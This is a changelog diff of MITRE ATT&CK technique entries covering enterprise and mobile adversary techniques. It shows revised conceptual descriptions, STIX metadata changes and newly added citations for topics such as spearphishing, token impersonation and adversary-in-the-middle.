>p file password, in order to evade email boundary defenses. >w to decrypt an attachment, such as a zip file password, in 
>Adversaries frequently manipulate file extensions and icons >order to evade email boundary defenses. Adversaries frequent
>in order to make attached executables appear to be document >ly manipulate file extensions and icons in order to make att
>files, or files exploiting one application appear to be a fi>ached executables appear to be document files, or files expl
>le for a different one. >oiting one application appear to be a file for a different o
 >ne. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:42.995000+00:002024-01-31 14:09:27.066000+00:00
descriptionAdversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.(Citation: Unit 42 DarkHydrus July 2018) Spearphishing may also involve social engineering techniques, such as posing as a trusted source. There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
x_mitre_attack_spec_version3.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Unit 42 DarkHydrus July 2018', 'description': 'Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.', 'url': 'https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/'}

[T1566.003] Phishing: Spearphishing via Service

Current version: 2.0


Old Description
New Description
t1Adversaries may send spearphishing messages via third-party t1Adversaries may send spearphishing messages via third-party 
>services in an attempt to gain access to victim systems. Spe>services in an attempt to gain access to victim systems. Spe
>arphishing via service is a specific variant of spearphishin>arphishing via service is a specific variant of spearphishin
>g. It is different from other forms of spearphishing in that>g. It is different from other forms of spearphishing in that
> it employs the use of third party services rather than dire> it employs the use of third party services rather than dire
>ctly via enterprise email channels.   All forms of spearphis>ctly via enterprise email channels.   All forms of spearphis
>hing are electronically delivered social engineering targete>hing are electronically delivered social engineering targete
>d at a specific individual, company, or industry. In this sc>d at a specific individual, company, or industry. In this sc
>enario, adversaries send messages through various social med>enario, adversaries send messages through various social med
>ia services, personal webmail, and other non-enterprise cont>ia services, personal webmail, and other non-enterprise cont
>rolled services. These services are more likely to have a le>rolled services.(Citation: Lookout Dark Caracal Jan 2018) Th
>ss-strict security policy than an enterprise. As with most k>ese services are more likely to have a less-strict security 
>inds of spearphishing, the goal is to generate rapport with >policy than an enterprise. As with most kinds of spearphishi
>the target or get the target's interest in some way. Adversa>ng, the goal is to generate rapport with the target or get t
>ries will create fake social media accounts and message empl>he target's interest in some way. Adversaries will create fa
>oyees for potential job opportunities. Doing so allows a pla>ke social media accounts and message employees for potential
>usible reason for asking about services, policies, and softw> job opportunities. Doing so allows a plausible reason for a
>are that's running in an environment. The adversary can then>sking about services, policies, and software that's running 
> send malicious links or attachments through these services.>in an environment. The adversary can then send malicious lin
>  A common example is to build rapport with a target via soc>ks or attachments through these services.  A common example 
>ial media, then send content to a personal webmail service t>is to build rapport with a target via social media, then sen
>hat the target uses on their work computer. This allows an a>d content to a personal webmail service that the target uses
>dversary to bypass some email restrictions on the work accou> on their work computer. This allows an adversary to bypass 
>nt, and the target is more likely to open the file since it'>some email restrictions on the work account, and the target 
>s something they were expecting. If the payload doesn't work>is more likely to open the file since it's something they we
> as expected, the adversary can continue normal communicatio>re expecting. If the payload doesn't work as expected, the a
>ns and troubleshoot with the target on how to get it working>dversary can continue normal communications and troubleshoot
>.> with the target on how to get it working.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:50.401000+00:002024-01-31 14:15:55.690000+00:00
descriptionAdversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services. A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: Lookout Dark Caracal Jan 2018) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services. A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.
x_mitre_attack_spec_version3.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Lookout Dark Caracal Jan 2018', 'description': 'Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.', 'url': 'https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf'}

[T1134.001] Access Token Manipulation: Token Impersonation/Theft

Current version: 1.2


Old Description
New Description
t1Adversaries may duplicate then impersonate another user's ext1Adversaries may duplicate then impersonate another user's ex
>isting token to escalate privileges and bypass access contro>isting token to escalate privileges and bypass access contro
>ls. For example, an adversary can duplicate an existing toke>ls. For example, an adversary can duplicate an existing toke
>n using `DuplicateToken` or `DuplicateTokenEx`. The token ca>n using `DuplicateToken` or `DuplicateTokenEx`.(Citation: Du
>n then be used with `ImpersonateLoggedOnUser` to allow the c>plicateToken function) The token can then be used with `Impe
>alling thread to impersonate a logged on user's security con>rsonateLoggedOnUser` to allow the calling thread to imperson
>text, or with `SetThreadToken` to assign the impersonated to>ate a logged on user's security context, or with `SetThreadT
>ken to a thread.  An adversary may perform [Token Impersonat>oken` to assign the impersonated token to a thread.  An adve
>ion/Theft](https://attack.mitre.org/techniques/T1134/001) wh>rsary may perform [Token Impersonation/Theft](https://attack
>en they have a specific, existing process they want to assig>.mitre.org/techniques/T1134/001) when they have a specific, 
>n the duplicated token to. For example, this may be useful f>existing process they want to assign the duplicated token to
>or when the target user has a non-network logon session on t>. For example, this may be useful for when the target user h
>he system.  When an adversary would instead use a duplicated>as a non-network logon session on the system.  When an adver
> token to create a new process rather than attaching to an e>sary would instead use a duplicated token to create a new pr
>xisting process, they can additionally [Create Process with >ocess rather than attaching to an existing process, they can
>Token](https://attack.mitre.org/techniques/T1134/002) using > additionally [Create Process with Token](https://attack.mit
>`CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token >re.org/techniques/T1134/002) using `CreateProcessWithTokenW`
>Impersonation/Theft](https://attack.mitre.org/techniques/T11> or `CreateProcessAsUserW`. [Token Impersonation/Theft](http
>34/001) is also distinct from [Make and Impersonate Token](h>s://attack.mitre.org/techniques/T1134/001) is also distinct 
>ttps://attack.mitre.org/techniques/T1134/003) in that it ref>from [Make and Impersonate Token](https://attack.mitre.org/t
>ers to duplicating an existing token, rather than creating a>echniques/T1134/003) in that it refers to duplicating an exi
> new one.>sting token, rather than creating a new one.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-29 21:08:45.174000+00:002024-01-10 17:57:36.177000+00:00
descriptionAdversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread. An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system. When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread. An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system. When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'DuplicateToken function', 'description': 'Microsoft. (2021, October 12). DuplicateToken function (securitybaseapi.h). Retrieved January 8, 2024.', 'url': 'https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetoken'}

[T1552] Unsecured Credentials

Current version: 1.3


Old Description
New Description
t1Adversaries may search compromised systems to find and obtait1Adversaries may search compromised systems to find and obtai
>n insecurely stored credentials. These credentials can be st>n insecurely stored credentials. These credentials can be st
>ored and/or misplaced in many locations on a system, includi>ored and/or misplaced in many locations on a system, includi
>ng plaintext files (e.g. [Bash History](https://attack.mitre>ng plaintext files (e.g. [Bash History](https://attack.mitre
>.org/techniques/T1552/003)), operating system or application>.org/techniques/T1552/003)), operating system or application
>-specific repositories (e.g. [Credentials in Registry](https>-specific repositories (e.g. [Credentials in Registry](https
>://attack.mitre.org/techniques/T1552/002)), or other special>://attack.mitre.org/techniques/T1552/002)),  or other specia
>ized files/artifacts (e.g. [Private Keys](https://attack.mit>lized files/artifacts (e.g. [Private Keys](https://attack.mi
>re.org/techniques/T1552/004)).>tre.org/techniques/T1552/004)).(Citation: Brining MimiKatz t
 >o Unix)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-13 00:29:53.605000+00:002024-04-15 21:33:12.892000+00:00
descriptionAdversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).(Citation: Brining MimiKatz to Unix)
x_mitre_attack_spec_version3.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Brining MimiKatz to Unix', 'description': 'Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.', 'url': 'https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf'}

[T1535] Unused/Unsupported Cloud Regions

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-04-22 16:46:43.876000+00:002023-12-14 16:28:24.680000+00:00
external_references[1]['url']https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fchttps://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc

[T1583.006] Acquire Infrastructure: Web Services

Current version: 1.2


Old Description
New Description
t1Adversaries may register for web services that can be used dt1Adversaries may register for web services that can be used d
>uring targeting. A variety of popular websites exist for adv>uring targeting. A variety of popular websites exist for adv
>ersaries to register for a web-based service that can be abu>ersaries to register for a web-based service that can be abu
>sed during later stages of the adversary lifecycle, such as >sed during later stages of the adversary lifecycle, such as 
>during Command and Control ([Web Service](https://attack.mit>during Command and Control ([Web Service](https://attack.mit
>re.org/techniques/T1102)), [Exfiltration Over Web Service](h>re.org/techniques/T1102)), [Exfiltration Over Web Service](h
>ttps://attack.mitre.org/techniques/T1567), or [Phishing](htt>ttps://attack.mitre.org/techniques/T1567), or [Phishing](htt
>ps://attack.mitre.org/techniques/T1566). Using common servic>ps://attack.mitre.org/techniques/T1566). Using common servic
>es, such as those offered by Google or Twitter, makes it eas>es, such as those offered by Google or Twitter, makes it eas
>ier for adversaries to hide in expected noise. By utilizing >ier for adversaries to hide in expected noise.(Citation: Fir
>a web service, adversaries can make it difficult to physical>eEye APT29) By utilizing a web service, adversaries can make
>ly tie back operations to them.> it difficult to physically tie back operations to them.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-12 20:19:07.916000+00:002024-01-16 22:47:59.395000+00:00
descriptionAdversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: FireEye APT29) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.
x_mitre_attack_spec_version3.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEye APT29', 'description': 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.', 'url': 'https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf'}

mobile-attack

New Techniques

[T1628.003] Hide Artifacts: Conceal Multimedia Files

Current version: 1.0

Description: Adversaries may attempt to hide multimedia files from the user. By doing so, adversaries may conceal captured files, such as pictures, videos and/or screenshots, then later exfiltrate those files. Specific to Android devices, if the `.nomedia` file is present in a folder, multimedia files in that folder will not be visible to the user in the Gallery application. Additionally, other applications are asked not to scan the folder with the `.nomedia` file, effectively making the folder appear invisible to the user. This technique is often used by stalkerware and spyware applications.


[T1664] Exploitation for Initial Access

Current version: 1.0

Description: Adversaries may exploit software vulnerabilities to gain initial access to a mobile device. This can be accomplished in a variety of ways. Vulnerabilities may be present in applications, services, the underlying operating system, or in the kernel itself. Several well-known mobile device exploits exist, including FORCEDENTRY, StageFright, and BlueBorne. Further, some exploits may be possible to exploit without any user interaction (zero-click), making them particularly dangerous. Mobile operating system vendors are typically very quick to patch such critical bugs, ensuring only a small window where they can be exploited.


[T1422.001] System Network Configuration Discovery: Internet Connection Discovery

Current version: 1.0

Description: Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using `adb shell netstat` for Android.(Citation: adb_commands) Adversaries may use the results and responses from these requests to determine if the mobile devices are capable of communicating with adversary-owned C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.


[T1521.003] Encrypted Channel: SSL Pinning

Current version: 1.0

Description: Adversaries may use [SSL Pinning](https://attack.mitre.org/techniques/T1521/003) to protect the C2 traffic from being intercepted and analyzed. [SSL Pinning](https://attack.mitre.org/techniques/T1521/003) is a technique commonly utilized by legitimate websites to ensure that encrypted communications are only allowed with a pre-defined certificate. If another certificate is presented, it could indicate device compromise, traffic interception, or another upstream issue. While benign usages are common, it is also possible for adversaries to abuse this technology to protect malicious C2 traffic. In normal, not pinned SSL validation, when a client connects to a server using HTTPS, it typically checks whether the server’s SSL/TLS certificate is signed by a trusted Certificate Authority (CA) in the device’s trust store. If the certificate is valid and signed by a trusted CA, the connection is established. However, with [SSL Pinning](https://attack.mitre.org/techniques/T1521/003) , the client is configured to trust a specific SSL/TLS certificate or public key, rather than relying on the device’s trust store. This means that even if the server’s certificate is signed by a trusted CA, the client will only establish the connection of the certificate or key is pinned. There are two types of [SSL Pinning](https://attack.mitre.org/techniques/T1521/003) : 1. Certificate Pinning: The client stores a copy of the server’s certificate and compares it with the certificate received during the SSL handshake. If the certificates match, then the client proceeds with the connection. This approach also works with self-signed certificates. 2. Public Key Pinning: Instead of pinning the entire certificate, the client pins just the public key extracted from the certificate. This is often more flexible, as it allows the server to renew its certificate without having to update the pinned certificate or breaking the SSL connection.


[T1422.002] System Network Configuration Discovery: Wi-Fi Discovery

Current version: 1.0

Description: Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Discovery](https://attack.mitre.org/tactics/TA0032) or [Credential Access](https://attack.mitre.org/tactics/TA0031) activity to support both ongoing and future campaigns.

Minor Version Changes

[T1638] Adversary-in-the-Middle

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
New Description
t1Adversaries may attempt to position themselves between two ot1Adversaries may attempt to position themselves between two o
>r more networked devices to support follow-on behaviors such>r more networked devices to support follow-on behaviors such
> as [Transmitted Data Manipulation](https://attack.mitre.org> as [Transmitted Data Manipulation](https://attack.mitre.org
>/techniques/T1565/002) or [Endpoint Denial of Service](https>/techniques/T1565/002) or [Endpoint Denial of Service](https
>://attack.mitre.org/techniques/T1642).       [Adversary-in-t>://attack.mitre.org/techniques/T1642).       [Adversary-in-t
>he-Middle](https://attack.mitre.org/techniques/T1638) can be>he-Middle](https://attack.mitre.org/techniques/T1638) can be
> achieved through several mechanisms, such as a malicious ap> achieved through several mechanisms. For example, a malicio
>plication registering itself as a VPN client. By doing this,>us application may register itself as a VPN client, effectiv
> the adversary can effectively redirect device traffic to wh>ely redirecting device traffic to adversary-owned resources.
>erever they want. However, registering as a VPN client requi> Registering as a VPN client requires user consent on both A
>res user consent on both Android and iOS. Additionally, on i>ndroid and iOS; additionally, a special entitlement granted 
>OS, the application requires a special entitlement that must>by Apple is needed for iOS devices. Alternatively, a malicio
> be granted by Apple. Alternatively, if an application is ab>us application with escalation privileges may utilize those 
>le to escalate privileges, it can potentially utilize those >privileges to gain access to network traffic.       Specific
>privileges to gain access to network traffic.       Outside > to Android devices, adversary-in-the-disk is a type of AiTM
>of a mobile device, adversaries may be able to capture traff> attack where adversaries monitor and manipulate data that i
>ic by employing a rogue base station or Wi-Fi access point. >s exchanged between applications and external storage.(Citat
>These devices will allow adversaries to capture network traf>ion: mitd_kaspersky)(Citation: mitd_checkpoint)(Citation: mi
>fic after it has left the device, while it is flowing to its>td_checkpoint_research) To accomplish this, a malicious appl
> destination. On a local network, enterprise techniques coul>ication firsts requests for access to multimedia files on th
>d be used, such as DNS redirection or DNS poisoning.       I>e device (`READ_EXTERNAL STORAGE` and `WRITE_EXTERNAL_STORAG
>f applications properly encrypt their network traffic, sensi>E`), then the application reads data on the device and/or wr
>tive data may not be accessible an adversary, depending on t>ites malware to the device. Though the request for access is
>he point of capture. > common, when used maliciously, adversaries may access files
 > and other sensitive data due to abusing the permission. Mul
 >tiple applications were shown to be vulnerable against this 
 >attack; however, scrutiny of permissions and input validatio
 >ns may mitigate this attack.      Outside of a mobile device
 >, adversaries may be able to capture traffic by employing a 
 >rogue base station or Wi-Fi access point. These devices will
 > allow adversaries to capture network traffic after it has l
 >eft the device, while it is flowing to its destination. On a
 > local network, enterprise techniques could be used, such as
 > [ARP Cache Poisoning](https://attack.mitre.org/techniques/T
 >1557/002) or [DHCP Spoofing](https://attack.mitre.org/techni
 >ques/T1557/003).       If applications properly encrypt thei
 >r network traffic, sensitive data may not be accessible to a
 >dversaries, depending on the point of capture. For example, 
 >properly implementing Apple’s Application Transport Security
 > (ATS) and Android’s Network Security Configuration (NSC) ma
 >y prevent sensitive data leaks.(Citation: NSC_Android)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-15 16:39:32.207000+00:002024-02-07 18:10:46.887000+00:00
descriptionAdversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic. Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning. If applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture. Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms. For example, a malicious application may register itself as a VPN client, effectively redirecting device traffic to adversary-owned resources. Registering as a VPN client requires user consent on both Android and iOS; additionally, a special entitlement granted by Apple is needed for iOS devices. Alternatively, a malicious application with escalation privileges may utilize those privileges to gain access to network traffic. Specific to Android devices, adversary-in-the-disk is a type of AiTM attack where adversaries monitor and manipulate data that is exchanged between applications and external storage.(Citation: mitd_kaspersky)(Citation: mitd_checkpoint)(Citation: mitd_checkpoint_research) To accomplish this, a malicious application firsts requests for access to multimedia files on the device (`READ_EXTERNAL STORAGE` and `WRITE_EXTERNAL_STORAGE`), then the application reads data on the device and/or writes malware to the device. Though the request for access is common, when used maliciously, adversaries may access files and other sensitive data due to abusing the permission. Multiple applications were shown to be vulnerable against this attack; however, scrutiny of permissions and input validations may mitigate this attack. Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as [ARP Cache Poisoning](https://attack.mitre.org/techniques/T1557/002) or [DHCP Spoofing](https://attack.mitre.org/techniques/T1557/003). If applications properly encrypt their network traffic, sensitive data may not be accessible to adversaries, depending on the point of capture. For example, properly implementing Apple’s Application Transport Security (ATS) and Android’s Network Security Configuration (NSC) may prevent sensitive data leaks.(Citation: NSC_Android)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'mitd_checkpoint', 'description': 'Check Point Research Team. (2018, August 12). Man-in-the-Disk: A New Attack Surface for Android Apps. Retrieved October 31, 2023.', 'url': 'https://blog.checkpoint.com/security/man-in-the-disk-a-new-attack-surface-for-android-apps/'}
external_references{'source_name': 'mitd_kaspersky', 'description': 'Drozhzhin, A. (2018, August 27). Man-in-the-Disk: A new and dangerous way to hack Android. Retrieved October 31, 2023.', 'url': 'https://usa.kaspersky.com/blog/man-in-the-disk/16089/'}
external_references{'source_name': 'NSC_Android', 'description': 'Lee, A., Ramirez, T. (2018, August 15). A Security Analyst’s Guide to Network Security Configuration in Android P . Retrieved February 7, 2024.', 'url': 'https://www.nowsecure.com/blog/2018/08/15/a-security-analysts-guide-to-network-security-configuration-in-android-p/'}
external_references{'source_name': 'mitd_checkpoint_research', 'description': 'Makkaveev, S. (2018, August 12). Man-in-the-Disk: Android Apps Exposed via External Storage. Retrieved October 31, 2023.', 'url': 'https://research.checkpoint.com/androids-man-in-the-disk/'}

[T1635] Steal Application Access Token

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-20 18:53:52.292000+00:002023-12-26 19:17:13.294000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[T1422] System Network Configuration Discovery

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description
New Description
t1Adversaries may look for details about the network configurat1Adversaries may look for details about the network configura
>tion and settings, such as IP and/or MAC addresses, of opera>tion and settings, such as IP and/or MAC addresses, of devic
>ting systems they access or through information discovery of>es they access or through information discovery of remote sy
> remote systems.      On Android, details of onboard network>stems.   Adversaries may use the information from [System Ne
> interfaces are accessible to apps through the `java.net.Net>twork Configuration Discovery](https://attack.mitre.org/tech
>workInterface` class.(Citation: NetworkInterface) Previously>niques/T1422) during automated discovery to shape follow-on 
>, the Android `TelephonyManager` class could be used to gath>behaviors, including determining certain access within the t
>er telephony-related device identifiers, information such as>arget network and what actions to do next.   On Android, det
> the IMSI, IMEI, and phone number. However, starting with An>ails of onboard network interfaces are accessible to apps th
>droid 10, only preloaded, carrier, the default SMS, or devic>rough the `java.net.NetworkInterface` class.(Citation: Netwo
>e and profile owner applications can access the telephony-re>rkInterface) Previously, the Android `TelephonyManager` clas
>lated device identifiers.(Citation: TelephonyManager)      O>s could be used to gather telephony-related device identifie
>n iOS, gathering network configuration information is not po>rs, information such as the IMSI, IMEI, and phone number. Ho
>ssible without root access.      Adversaries may use the inf>wever, starting with Android 10, only preloaded, carrier, th
>ormation from [System Network Configuration Discovery](https>e default SMS, or device and profile owner applications can 
>://attack.mitre.org/techniques/T1422) during automated disco>access the telephony-related device identifiers.(Citation: T
>very to shape follow-on behaviors, including determining cer>elephonyManager)      On iOS, gathering network configuratio
>tain access within the target network and what actions to do>n information is not possible without root access.      Adve
> next. >rsaries may use the information from [System Network Configu
 >ration Discovery](https://attack.mitre.org/techniques/T1422)
 > during automated discovery to shape follow-on behaviors, in
 >cluding determining certain access within the target network
 > and what actions to do next. 
Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-20 18:50:32.697000+00:002024-02-20 23:35:22.949000+00:00
descriptionAdversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of operating systems they access or through information discovery of remote systems. On Android, details of onboard network interfaces are accessible to apps through the `java.net.NetworkInterface` class.(Citation: NetworkInterface) Previously, the Android `TelephonyManager` class could be used to gather telephony-related device identifiers, information such as the IMSI, IMEI, and phone number. However, starting with Android 10, only preloaded, carrier, the default SMS, or device and profile owner applications can access the telephony-related device identifiers.(Citation: TelephonyManager) On iOS, gathering network configuration information is not possible without root access. Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of devices they access or through information discovery of remote systems. Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. On Android, details of onboard network interfaces are accessible to apps through the `java.net.NetworkInterface` class.(Citation: NetworkInterface) 